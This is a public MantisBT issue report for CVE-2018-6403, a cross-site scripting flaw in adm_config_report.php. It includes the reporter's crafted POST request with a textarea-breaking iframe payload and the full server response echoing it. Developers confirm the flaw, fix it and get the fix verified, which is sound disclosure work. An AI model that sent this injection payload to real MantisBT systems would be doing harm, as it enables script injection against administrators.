View Issue Details

IDProjectCategoryView StatusLast Update
0023906mantisbtsecuritypublic2018-02-06 21:17
Reportertuanklnew Assigned Todregad  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
Product Version1.3.0 
Target Version2.10.1Fixed in Version2.10.1 
Summary0023906: CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
Description

Elements of POST array "value" (I tested on fixed_in_version, project_id, id) on adm_config_report.php are added scripts (in my case is </textarea><iframe src=javascript:alert(1212) ). That script is in respond HTML and executed by web browser.

This vulnerability affects Mantis 2.8 and 2.10 (I have not tested on 2.9 due to lack of time)

Steps To Reproduce

Parameters are needed to filter properly before they are accepted and respond to client.

TagsNo tags attached.

Relationships

has duplicate 0023918 closeddregad CVE-2018-6403: XSS in adm_config_report.php 'value' parameter 

Activities

tuanklnew

tuanklnew

2018-01-29 03:36

reporter  

script_executed.PNG (3,145 bytes)   
script_executed.PNG (3,145 bytes)   
modified_POST.txt (892 bytes)   
POST /mantisbt/adm_config_report.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.70.11/mantisbt/adm_config_report.php
Cookie: MANTIS_secure_session=1;
MANTIS_STRING_COOKIE=6xgdamq8V5fgA4vDchh450KI4bKW2kxYeNRdhYfw4cvWrMPmBa7KMqx2HDi7QbsW;
PHPSESSID=ll27va6a7c2r3rv8m75phoraa7
Host: 192.168.70.11
Content-Length: 353
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
user_id=0&project_id=0&config_option=csv_columns&type=3&value=["id","project_id","reporter_id","handler_id","priority","severity","reproducibility","version","category_id","date_submitted","os","os_build","platform","view_state","last_updated","summary","status","resolution","fixed_in_version</textarea><iframe src=javascript:alert(1212) "]&action=edit
modified_POST.txt (892 bytes)   
respond.html (19,430 bytes)   
HTTP/1.1 200 OK
Date: Fri, 26 Jan 2018 09:14:18 GMT
Server: Apache/2.4.27 (Fedora) OpenSSL/1.0.2m-fips PHP/7.0.25
X-Powered-By: PHP/7.0.25
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 26 Jan 2018 09:14:18 GMT
X-Content-Type-Options: nosniff
Expires: Fri, 26 Jan 2018 09:14:18 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self'
Vary: Accept-Encoding
Content-Length: 18867
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>Configuration Report - MantisBT</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/default.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/status_config.php?cache_key=6fb1932f97af9a6f92ad6fe2f080e360" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/dropzone-4.3.0.min.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/bootstrap-3.3.6.min.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/font-awesome-4.6.3.min.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/open-sans.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/bootstrap-datetimepicker-4.17.47.min.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/ace.min.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/ace-mantis.css" />
	<link rel="stylesheet" type="text/css" href="https://192.168.154.131/css/ace-skins.min.css" />

	<link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon" />
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="https://192.168.154.131/browser_search_plugin.php?type=text"/>
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="https://192.168.154.131/browser_search_plugin.php?type=id"/>
	<script type="text/javascript" src="/javascript_config.php?cache_key=6fb1932f97af9a6f92ad6fe2f080e360"></script>
	<script type="text/javascript" src="/javascript_translations.php?cache_key=66f3ab6a24b5bf0b66dfd68a4a0def28"></script>
	<script type="text/javascript" src="/js/jquery-2.2.4.min.js"></script>
	<script type="text/javascript" src="/js/dropzone-4.3.0.min.js"></script>
	<script type="text/javascript" src="/js/common.js"></script>
</head>
<body class="skin-3">
<div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a><a class="btn btn-primary btn-sm" href="manage_user_create_page.php"><i class="fa fa-user-plus"></i> Invite Users</a></div></li><li class="grey" id="dropdown_projects_menu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
&#160;test_eximbank&#160;
 <i class="ace-icon fa fa-angle-down bigger-110"></i>
</a>
<ul class="dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close scrollable-menu">
<li><a href="/set_project.php?project_id=0"> All Projects </a></li> 
<li class="divider"></li>
<li><div id="projects-list"><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div><ul class="list dropdown-yellow no-margin"><li><a href="/set_project.php?project_id=2" class="project-link"> my_project1 </a></li>
<li class="active"><a href="/set_project.php?project_id=1" selected="selected" class="project-link"> test_eximbank </a></li>
</ul></div></li></ul>
</li>
<li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">administrator</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="https://192.168.154.131/issues_rss.php?username=administrator&amp;key=1_J7IxJqc89euOxuziPvqBX6GDI7KKVacL4JebebFn-n7leLsOIgtAf2uEWFa1piD897xSrHdlGOwyAp58ek&amp;project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
<div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
<a href="/my_view_page.php">
<i class="menu-icon fa fa-dashboard"></i> 
<span class="menu-text"> My View </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/view_all_bug_page.php">
<i class="menu-icon fa fa-list-alt"></i> 
<span class="menu-text"> View Issues </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/bug_report_page.php">
<i class="menu-icon fa fa-edit"></i> 
<span class="menu-text"> Report Issue </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/changelog_page.php">
<i class="menu-icon fa fa-retweet"></i> 
<span class="menu-text"> Change Log </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/roadmap_page.php">
<i class="menu-icon fa fa-road"></i> 
<span class="menu-text"> Roadmap </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/summary_page.php">
<i class="menu-icon fa fa-bar-chart-o"></i> 
<span class="menu-text"> Summary </span>
</a>
<b class="arrow"></b>
</li>
<li class="active">
<a href="/manage_overview_page.php">
<i class="menu-icon fa fa-gears"></i> 
<span class="menu-text"> Manage </span>
</a>
<b class="arrow"></b>
</li>
</ul><div id="sidebar" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
		class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
<div id="breadcrumbs" class="breadcrumbs noprint">
<ul class="breadcrumb">
  <li><i class="fa fa-user home-icon active"></i>  <a href="/account_page.php">administrator ( Nguyen Tri Tuan ) </a>
  <span class="label hidden-xs label-default arrowed">administrator</span></li>
</ul>
<div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
</div>
  <div class="page-content">
<div class="row">
<ul class="nav nav-tabs padding-18">
<li class="">
<a href="manage_overview_page.php"><i class="blue ace-icon fa fa-info-circle"></i> </a></li>
<li class="">
<a href="/manage_user_page.php">Manage Users</a></li>
<li class="">
<a href="/manage_proj_page.php">Manage Projects</a></li>
<li class="">
<a href="/manage_tags_page.php">Manage Tags</a></li>
<li class="">
<a href="/manage_custom_field_page.php">Manage Custom Fields</a></li>
<li class="">
<a href="/manage_prof_menu_page.php">Manage Global Profiles</a></li>
<li class="">
<a href="/manage_plugin_page.php">Manage Plugins</a></li>
<li class="active">
<a href="/adm_permissions_report.php">Manage Configuration</a></li>
</ul>
<div class="space-10"></div>
<div class="center">
<div class="btn-toolbar inline">
<div class="btn-group">
<a class="btn btn-sm btn-white btn-primary " href="/adm_permissions_report.php">
Permissions Report</a>
<a class="btn btn-sm btn-white btn-primary active" href="/adm_config_report.php">
Configuration Report</a>
<a class="btn btn-sm btn-white btn-primary " href="/manage_config_work_threshold_page.php">
Workflow Thresholds</a>
<a class="btn btn-sm btn-white btn-primary " href="/manage_config_workflow_page.php">
Workflow Transitions</a>
<a class="btn btn-sm btn-white btn-primary " href="/manage_config_email_page.php">
E-mail Notifications</a>
<a class="btn btn-sm btn-white btn-primary " href="/manage_config_columns_page.php">
Manage Columns</a>
</div>
</div>
</div>

<div class="col-md-12 col-xs-12">
<div class="space-10"></div>

<!-- FILTER FORM -->
<form id="filter_form" method="post">
			<input type="hidden" name="save" value="1" />

<div class="widget-box widget-color-blue2">
<div class="widget-header widget-header-small">
<h4 class="widget-title lighter">
	<i class="ace-icon fa fa-filter"></i>
	Filters</h4>
</div>

<div class="widget-body">
<div class="widget-main no-padding">
	<div class="table-responsive">
	<table class="table table-striped table-bordered table-condensed">
		<!-- Title -->
		<thead>
			<tr>
				<th>
					Username<br />
				</th>
				<th>
					Project Name<br />
				</th>
				<th>
					Configuration Option<br />
				</th>
			</tr>
		</thead>

		<tbody>
			<tr>
				<td>
					<select name="filter_user_id" class="input-sm">
						<option value="-2">[any]</option>
<option value="0" selected="selected">All Users</option>
<option value="1">administrator</option>
					</select>
				</td>
				<td>
					<select name="filter_project_id" class="input-sm">
						<option value="-2">[any]</option>
<option value="0" selected="selected">All Projects</option>
<option value="1">test_eximbank</option>
					</select>
				</td>
				<td>
					<select name="filter_config_id" class="input-sm">
						<option value="-2" selected="selected">[any]</option>
<option value="csv_columns">csv_columns</option>
<option value="database_version">database_version</option>
<option value="excel_columns">excel_columns</option>
<option value="plugin_MantisGraph_schema">plugin_MantisGraph_schema</option>
<option value="print_issues_page_columns">print_issues_page_columns</option>
<option value="view_issues_page_columns">view_issues_page_columns</option>
					</select>
				</td>
			</tr>
		</tbody>
	</table>
</div>
</div>
<div class="widget-toolbox padding-8 clearfix">
	<div class="btn-toolbar">
		<div class="btn-group">
			<input name="apply_filter_button" type="submit" class="btn btn-sm btn-primary btn-white btn-round"
				value="Apply Filter" />

			<input name="default_filter_button" type="submit" class="btn btn-sm btn-primary btn-white btn-round"
				value="Default Filter" />

			<input name="reset_filter_button" type="submit" class="btn btn-sm btn-primary btn-white btn-round"
				value="Reset Filter" />
		</div>
	</div>
</div>
</div>
</div>
</form>


<div class="space-10"></div>

<!-- CONFIGURATIONS LIST -->
<div class="widget-box widget-color-blue2">
<div class="widget-header widget-header-small">
<h4 class="widget-title lighter">
<i class="ace-icon fa fa-database"></i>
Database Configuration</h4>
</div>

<div class="widget-body">
<div class="widget-main no-padding">
<div class="table-responsive">
	<table class="table table-striped table-bordered table-condensed table-hover">
		<thead>
			<tr>
				<th>Username</th>
				<th>Project Name</th>
				<th>Configuration Option</th>
				<th>Type</th>
				<th>Value</th>
				<th>Access Level</th>
								<th>Actions</th>
							</tr>
		</thead>

		<tbody>
<!-- Repeated Info Rows -->
			<tr class="visible-on-hover-toggle">
				<td>
					All Users				</td>
				<td>All Projects</td>
				<td>database_version</td>
				<td>integer</td>
				<td style="overflow-x:auto;">209</td>
				<td>administrator</td>
<td class="center">
	<div class="btn-group inline visible-on-hover">
&#160;	</div>
				</td>
			</tr>
<!-- Repeated Info Rows -->
			<tr class="visible-on-hover-toggle">
				<td>
					All Users				</td>
				<td>All Projects</td>
				<td>plugin_MantisGraph_schema</td>
				<td>integer</td>
				<td style="overflow-x:auto;">-1</td>
				<td>administrator</td>
<td class="center">
	<div class="btn-group inline visible-on-hover">
<div class="pull-left"><form method="post" action="#config_set_form" class="form-inline inline single-button-form"><fieldset><button type="submit" class="btn btn-primary btn-xs btn-white btn-round">Edit</button><input type="hidden" name="user_id" value="0" />
<input type="hidden" name="project_id" value="0" />
<input type="hidden" name="config_option" value="plugin_MantisGraph_schema" />
<input type="hidden" name="type" value="1" />
<input type="hidden" name="value" value="-1" />
<input type="hidden" name="action" value="edit" />
</fieldset></form></div><div class="pull-left"><form method="post" action="#config_set_form" class="form-inline inline single-button-form"><fieldset><button type="submit" class="btn btn-primary btn-xs btn-white btn-round">Clone</button><input type="hidden" name="user_id" value="0" />
<input type="hidden" name="project_id" value="0" />
<input type="hidden" name="config_option" value="plugin_MantisGraph_schema" />
<input type="hidden" name="type" value="1" />
<input type="hidden" name="value" value="-1" />
<input type="hidden" name="action" value="clone" />
</fieldset></form></div><div class="pull-left"><form method="post" action="adm_config_delete.php" class="form-inline inline single-button-form"><fieldset><input type="hidden" name="adm_config_delete_token" value="20180126h3n0Q_bYL1LD3XkKuJSd_R1lqq1vuv7a"/><button type="submit" class="btn btn-primary btn-xs btn-white btn-round">Delete</button><input type="hidden" name="user_id" value="0" />
<input type="hidden" name="project_id" value="0" />
<input type="hidden" name="config_option" value="plugin_MantisGraph_schema" />
</fieldset></form></div>	</div>
				</td>
			</tr>
		</tbody>
	</table>
</div>
</div>
</div>
</div>


<!-- Config Set Form -->
<div class="space-10"></div>


<div id="config-edit-div">
<form id="config_set_form" method="post" action="adm_config_set.php">

		<!-- Title -->
		<div class="widget-box widget-color-blue2">
		<div class="widget-header widget-header-small">
		<h4 class="widget-title lighter">
			<i class="ace-icon fa fa-sliders"></i>
			Edit Configuration Option			</h4>
		</div>

	<div class="widget-body">
		<div class="widget-main no-padding">

		<div id="config-edit-div" class="form-container">
		<div class="table-responsive">
		<table class="table table-bordered table-condensed table-striped">
		<fieldset>
		<input type="hidden" name="adm_config_set_token" value="20180126y9dhef8zoUgx_adKO8hGLePPmTzA5BCY"/>
		<!-- Username -->
		<tr>
			<td class="category">
				Username			</td>
			<td>
				<select id="config-user-id" name="user_id" class="input-sm">
					<option value="0"
						 selected="selected">
						All Users					</option>
					<option value="1" >administrator</option><option value="5" >tuanklnew</option>				</select>
				<input type="hidden" name="original_user_id" value="0" />
			</td>
		</tr>

			<!-- Project -->
			<tr>
				<td class="category">
					Project Name				</td>
				<td>
					<select id="config-project-id" name="project_id" class="input-sm">
						<option value="0"
							 selected="selected">
							All Projects						</option>
						<option value="2">my_project1</option>
<option value="1">test_eximbank</option>
					</select>
					<input type="hidden" name="original_project_id" value="0" />
				</td>
			</tr>

			<!-- Config option name -->
			<tr>
				<td class="category">
					Configuration Option				</td>
				<td>
					<input type="text" name="config_option" class="input-sm"
						   value="csv_columns"
						   size="64" maxlength="64" />
					<input type="hidden" name="original_config_option" value="csv_columns" />
				</td>
			</tr>

			<!-- Option type -->
			<tr>
				<td class="category">
					Type				</td>
				<td>
					<select id="config-type" name="type" class="input-sm">
						<option value="0">default</option>
<option value="1">integer</option>
<option value="4">float</option>
<option value="3" selected="selected">complex</option>
<option value="2">string</option>
					</select>
				</td>
			</tr>

			<!-- Option Value -->
			<tr>
				<td class="category">
					Value				</td>
				<td>
					<textarea class="form-control" name="value" cols="80" rows="10">array (
  0 => 'id',
  1 => 'project_id',
  2 => 'reporter_id',
  3 => 'handler_id',
  4 => 'priority',
  5 => 'severity',
  6 => 'reproducibility',
  7 => 'version',
  8 => 'category_id',
  9 => 'date_submitted',
  10 => 'os',
  11 => 'os_build',
  12 => 'platform',
  13 => 'view_state',
  14 => 'last_updated',
  15 => 'summary',
  16 => 'status',
  17 => 'resolution',
  18 => 'fixed_in_version</textarea><iframe src=javascript:alert(1212) ',
)</textarea>
				</td>
			</tr>
		</fieldset>
	</table>
	</div>

	</div>
		<div class="widget-toolbox padding-4 clearfix">
			<input type="hidden" name="action" value="edit" />
			<input type="submit" name="config_set" class="btn btn-primary btn-white btn-round"
				value="Edit Configuration Option"/>
		</div>
	</div>
	</div>
	</div>
</form>
</div>


</div>

</div>
</div>
</div>
<div class="clearfix"></div>
<div class="space-20"></div>
<div class="footer noprint">
<div class="footer-inner">
<div class="footer-content">
<div class="col-md-6 col-xs-12 no-padding">
<address>
<strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br>
<small>Copyright &copy; 2000 - 2018 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br>
</address>
</div>
<div class="col-md-6 col-xs-12">
<div class="pull-right" id="powered-by-mantisbt-logo">
<a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
</div>
</div>
</div>
</div>
</div>
<a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
<i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
</a>
</div>
	<script type="text/javascript" src="/js/bootstrap-3.3.6.min.js"></script>
	<script type="text/javascript" src="/js/moment-with-locales-2.15.2.min.js"></script>
	<script type="text/javascript" src="/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
	<script type="text/javascript" src="/js/typeahead.jquery-1.1.1.min.js"></script>
	<script type="text/javascript" src="/js/list-1.4.1.min.js"></script>
	<script type="text/javascript" src="/js/ace.min.js"></script>
</body>
</html>
respond.html (19,430 bytes)   
dregad

dregad

2018-01-29 09:30

developer   ~0058660

Thank you for the bug report, we'll look into it.

Did you request a CVE ID for this vulnerability, or should we do it ? How would you like to be credited for the finding ?

tuanklnew

tuanklnew

2018-01-29 10:00

reporter   ~0058661

May I have CVE ID for this vulnerability? There are still other vulnerabilities. I am working to find out how serious they are. I will report issue when I got result.

vboctor

vboctor

2018-01-29 23:10

manager   ~0058666

It is worth noting that setting configuration is allowed to administrator as per recommendation and default config:

$g_set_configuration_threshold = ADMINISTRATOR;
tuanklnew

tuanklnew

2018-01-30 02:50

reporter   ~0058671

But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

dregad

dregad

2018-01-30 03:20

developer   ~0058672

But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

We'll fix it, don't worry.

May I have CVE ID for this vulnerability

I'll post it here when MITRE assigns it.

You have not answered my question:

How would you like to be credited for the finding ?

dregad

dregad

2018-01-30 05:50

developer   ~0058674

Last edited: 2018-01-30 06:22

View 2 revisions

I confirm the vulnerability, reproducible on my local dev box, in 1.3.x branch also (tested from 1.3.0 onwards).

I'd also like to point out that the risk is mitigated (with default settings and modern browsers), the XSS is not exploitable due to our CSP headers.

dregad

dregad

2018-01-30 06:58

developer   ~0058678

CVE request 456011 sent

vboctor

vboctor

2018-01-30 12:12

manager   ~0058682

I wasn't indicating that we shouldn't fix it, but we should make it clear in the CVE that administrators by default can attack themselves.

dregad

dregad

2018-01-31 03:33

developer   ~0058692

CVE-2018-6403 assigned.

dregad

dregad

2018-01-31 07:01

developer   ~0058697

@tuanklnew I pushed a commit that fixes the vulnerability as far as I can tell; please confirm that it's OK from your end as well.

tuanklnew

tuanklnew

2018-02-04 20:30

reporter   ~0058742

@dregad let me check.

tuanklnew

tuanklnew

2018-02-04 21:41

reporter   ~0058743

I 've checked. It's fixed.

dregad

dregad

2018-02-05 01:49

developer   ~0058744

Thanks for the feedback!

Related Changesets

MantisBT: master-2.10 c4afcb11

2018-01-30 06:58:29

dregad

Details Diff
Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906
Affected Issues
0023906
mod - adm_config_report.php Diff File

MantisBT: master-1.3.x 9e4db60a

2018-01-30 06:58:29

dregad

Details Diff
Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906, 0023918

Cherry-picked from c4afcb118472fef8d3a7f468b16d874f9d6cf871.
Affected Issues
0023906, 0023918
mod - adm_config_report.php Diff File

Issue History

Date Modified Username Field Change
2018-01-29 03:36 tuanklnew New Issue
2018-01-29 03:36 tuanklnew File Added: script_executed.PNG
2018-01-29 03:36 tuanklnew File Added: modified_POST.txt
2018-01-29 03:36 tuanklnew File Added: respond.html
2018-01-29 09:30 dregad Note Added: 0058660
2018-01-29 09:32 dregad Status new => acknowledged
2018-01-29 10:00 tuanklnew Note Added: 0058661
2018-01-29 23:10 vboctor Note Added: 0058666
2018-01-29 23:12 vboctor Target Version => 2.10.1
2018-01-30 02:50 tuanklnew Note Added: 0058671
2018-01-30 03:20 dregad Note Added: 0058672
2018-01-30 05:50 dregad Status acknowledged => confirmed
2018-01-30 05:50 dregad Note Added: 0058674
2018-01-30 06:22 dregad Note Edited: 0058674 View Revisions
2018-01-30 06:22 dregad Product Version 2.10.0 => 1.3.0
2018-01-30 06:58 dregad Note Added: 0058678
2018-01-30 12:12 vboctor Note Added: 0058682
2018-01-31 03:33 dregad Assigned To => dregad
2018-01-31 03:33 dregad Status confirmed => assigned
2018-01-31 03:33 dregad Summary POST array "value" of adm_config_report.php is affected by Cross-site scripting vulnerability => CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
2018-01-31 03:33 dregad Note Added: 0058692
2018-01-31 06:53 dregad Issue cloned: 0023918
2018-01-31 06:53 dregad Relationship added has duplicate 0023918
2018-01-31 06:54 dregad Changeset attached => MantisBT master-2.10 c4afcb11
2018-01-31 06:54 dregad Status assigned => resolved
2018-01-31 06:54 dregad Resolution open => fixed
2018-01-31 06:54 dregad Changeset attached => MantisBT master-1.3.x 9e4db60a
2018-01-31 06:54 dregad Fixed in Version => 1.3.14
2018-01-31 06:57 dregad Fixed in Version 1.3.14 => 2.10.1
2018-01-31 06:57 dregad View Status private => public
2018-01-31 07:01 dregad Note Added: 0058697
2018-02-04 20:30 tuanklnew Note Added: 0058742
2018-02-04 21:41 tuanklnew Note Added: 0058743
2018-02-05 01:49 dregad Note Added: 0058744
2018-02-06 21:17 vboctor Status resolved => closed